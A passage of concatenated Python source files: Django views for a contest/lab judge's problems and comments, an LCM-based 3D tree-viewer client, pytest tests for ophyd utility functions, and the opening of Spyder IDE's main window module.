return redirect('/problems/view?pid=' + str(problem.problemId) + "&&" + idName + "=" + objectId)
'''
Function to delete particular Problem
'''
@faculty_required()
def delete(request):
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, isItLab):
return render(request, 'accessDenied.html', {})
idName = ""
if isItLab:
problem.doesBelongToContest = False
idName = "labId"
else:
problem.doesBelongToContest = True
idName = "contestId"
if request.method == 'GET':
return render(request, 'problem/delete.html', {'problem': problem, 'idName': idName, 'idValue': objectId})
problem.delete()
return redirect('/problems?' + idName + "=" + objectId)
'''
function to list out the problem comments
'''
@login_required(login_url='/users/login')
def comments(request):
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, not problem.doesBelongToContest):
return render(request, 'accessDenied.html', {})
problemComments = ProblemComment.objects.filter(problem=problem)
objectName = ""
objectId = 0
if problem.doesBelongToContest:
objectName = "contestId"
objectId = problem.contest.contestId
else:
objectName = "labId"
objectId = problem.lab.labId
return render(request, 'problem/commentsList.html',
{'comments': problemComments, 'pid': pid, 'problem': problem, 'objectName': objectName,
'objectId': objectId})
'''
function to create the problem comments
'''
@login_required(login_url='/users/login')
def commentCreate(request):
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, not problem.doesBelongToContest):
return render(request, 'accessDenied.html', {})
comment = request.POST["comment"]
user = request.user
newComment = ProblemComment(comment=comment, user=user, problem=problem)
newComment.save()
return redirect('/problems/comments/?pid' + "=" + pid)
@faculty_required()
def testEdit(request):
result, tid, testCase = getTestCase(request)
if not result:
return render(request, '404.html', {})
else:
if not customRoleBasedTestProblemAuthorization(request, testCase.problem):
return render(request, 'accessDenied.html', {})
input = request.POST.get("input")
output = request.POST.get("output")
input = input.replace('\r', '')
output = output.replace('\r', '')
fpInput = open(os.path.join(settings.BASE_DIR, testCase.inputFile.url[1:]), "w")
fpInput.write(input)
fpInput.close()
fpOutput = open(os.path.join(settings.BASE_DIR, testCase.outputFile.url[1:]), "w")
fpOutput.write(output)
fpOutput.close()
reEvaluateSubmissions(request, testCase.problem.problemId)
return redirect('/problems/tests/?pid=' + str(testCase.problem.problemId))
|
viewerclient.py
|
from __future__ import absolute_import, division, print_function
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = json.dumps(data)
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform))
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1,1,1]):
self.lengths = lengths
def serialize(self):
return {
"type": "box",
"lengths": list(self.lengths)
}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {
"type": "sphere",
"radius": self.radius
}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1,1,1]):
self.radii = radii
def serialize(self):
return {
"type": "ellipsoid",
"radii": list(self.radii)
}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {
"type": "cylinder",
"length": self.length,
"radius": self.radius
}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {
"type": "triad",
"scale": self.scale,
"tube": self.tube
}
class PolyLine(BaseGeometry):
def __init__(self, points, radius=0.01, closed=False,
start_head=False, end_head=False,
head_radius=0.05, head_length=None):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": self.points,
"radius": self.radius,
"closed": self.closed
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in self.children.items():
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,),
lcm=self.core.lcm,
core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
self.publish_immediately = True
self.lcm.subscribe(self._response_channel(),
self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(
target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data)
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data))
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append({
"path": path,
"geometries": [geom.serialize() for geom in geoms]
})
for path in self.queue.settransform:
settransform.append({
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform)
})
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform
}
if __name__ == '__main__':
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[GeometryData(Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]))
for x in range(10)])
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1])))
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
# bug, the sphere is loaded and replaces the previous
# geometry but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
#vis.delete()
|
test_utils.py
|
import logging
import sys
import threading
import time
import pytest
from ophyd import Component as Cpt
from ophyd import Device
from .. import utils
from ..device import GroupDevice
from ..utils import post_ophyds_to_elog
try:
import pty
except ImportError:
pty = None
logger = logging.getLogger(__name__)
pty_missing = "Fails on Windows, pty not supported in Windows Python."
@pytest.fixture(scope='function')
def sim_input(monkeypatch):
master, slave = pty.openpty()
with open(slave, 'r') as fake_stdin:
with open(master, 'w') as sim_input:
monkeypatch.setattr(sys, 'stdin', fake_stdin)
yield sim_input
def input_later(sim_input, inp, delay=0.1):
def inner():
time.sleep(delay)
sim_input.write(inp)
threading.Thread(target=inner, args=()).start()
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
def test_is_input(sim_input):
logger.debug('test_is_input')
sim_input.write('a\n')
assert utils.is_input()
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(5)
def test_get_input_waits(sim_input):
logger.debug('test_get_input_waits')
input_later(sim_input, 'a\n', delay=2)
assert utils.get_input() == 'a'
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(0.5)
def test_get_input_arrow(sim_input):
logger.debug('test_get_input_arrow')
input_later(sim_input, utils.arrow_up + '\n')
assert utils.get_input() == utils.arrow_up
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(0.5)
def test_get_input_shift_arrow(sim_input):
logger.debug('test_get_input_arrow')
input_later(sim_input, utils.shift_arrow_up + '\n')
assert utils.get_input() == utils.shift_arrow_up
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(0.5)
def test_cbreak(sim_input):
logger.debug('test_cbreak')
# send the ctrl+c character
input_later(sim_input, '\x03\n')
assert utils.get_input() == '\n'
def test_get_status_value():
dummy_dictionary = {'dict1': {'dict2': {'value': 23}}}
res = utils.get_status_value(dummy_dictionary, 'dict1', 'dict2', 'value')
assert res == 23
res = utils.get_status_value(dummy_dictionary, 'dict1', 'dict2', 'blah')
assert res == 'N/A'
def test_get_status_float():
dummy_dictionary = {'dict1': {'dict2': {'value': 23.34343}}}
res = utils.get_status_float(dummy_dictionary, 'dict1', 'dict2', 'value')
assert res == '23.3434'
res = utils.get_status_float(dummy_dictionary, 'dict1', 'dict2', 'blah')
assert res == 'N/A'
res = utils.get_status_float(
dummy_dictionary, 'dict1', 'dict2', 'value', precision=3
)
assert res == '23.343'
class StatusDevice(Device):
""" simulate a device with a status method """
def status(self):
return self.name
class BasicGroup(StatusDevice, GroupDevice):
one = Cpt(StatusDevice, ':BASIC')
two = Cpt(StatusDevice, ':COMPLEX')
class SomeDevice(StatusDevice):
some = Cpt(StatusDevice, ':SOME')
where = Cpt(StatusDevice, ':WHERE')
def test_ophyd_to_elog(elog):
# make some devices
group = BasicGroup('GROUP', name='group')
some = SomeDevice('SOME', name='some')
post_ophyds_to_elog([group, some], hutch_elog=elog)
assert len(elog.posts) == 1
# count number of content entries
assert elog.posts[-1][0][0].count('<pre>') == 2
post_ophyds_to_elog([group.one, some.some], hutch_elog=elog)
assert len(elog.posts) == 1 # no children allowed by default
post_ophyds_to_elog([[group, some], group.one, some.some],
allow_child=True, hutch_elog=elog)
assert len(elog.posts) == 2
assert elog.posts[-1][0][0].count('<pre>') == 4
# two list levels
assert elog.posts[-1][0][0].count("class='parent'") == 2
# half-hearted html validation
for post in elog.posts:
for tag in ['pre', 'div', 'button']:
assert post[0][0].count('<'+tag) == post[0][0].count('</'+tag)
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import gc
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, running_under_pytest
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('Tellurium_splash.png'), 'png'))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __trouble_url_short__, get_versions)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
DEBUG, debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
from spyder.widgets.fileswitcher import FileSwitcher
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.open_project
self.window_title = options.window_title
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Create our TEMPDIR
if not osp.isdir(programs.TEMPDIR):
os.mkdir(programs.TEMPDIR)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.not_active_path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
self.not_active_path, _x = \
encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = \
[name for name in self.not_active_path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.extconsole = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.fileswitcher = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
from spyder.plugins.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, MainInterpreterConfigPage,
RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See issue 4132
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
"""Debug prints"""
debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# File switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_fileswitcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
